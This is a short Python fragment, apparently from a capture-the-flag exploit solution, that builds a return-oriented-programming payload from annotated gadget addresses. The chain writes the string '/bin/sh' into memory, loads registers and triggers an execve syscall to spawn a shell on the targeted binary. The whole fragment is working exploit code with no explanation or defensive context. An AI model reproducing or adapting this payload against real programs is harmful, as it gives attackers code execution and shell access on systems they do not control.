payload = p64(0x4082e7)
#0x00000000004082e7: pop rbx; pop r12; ret; 
payload += p64(0x80)+p64(0x42d1cf)+p64(0x407de4)
# 0x0000000000407de4: mov qword ptr [r12 + 8], rbx; add rsp, 0x18; pop rbx; pop rbp; pop r12; pop r13; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4082e7)
# 0x00000000004082e7: pop rbx; pop r12; ret; 
payload += p64(0x68662f6e69622f)+p64(0x42d068)+p64(0x407de4)
# 0x0000000000407de4: mov qword ptr [r12 + 8], rbx; add rsp, 0x18; pop rbx; pop rbp; pop r12; pop r13; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x42d070)+p64(0x407cd5)
# 0x0000000000407cd5: pop rsi; mov rax, rsi; ret; 
payload += p64(0x36b2cfec)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x407cd5)
# 0x0000000000407cd5: pop rsi; mov rax, rsi; ret; 
payload += p64(0x3b)+p64(0x408081)
# 0x0000000000408081: pop rsi; ret; 
payload += p64(0x0)+p64(0x41de14)
# 0x000000000041de14: syscall; 
payload += b''
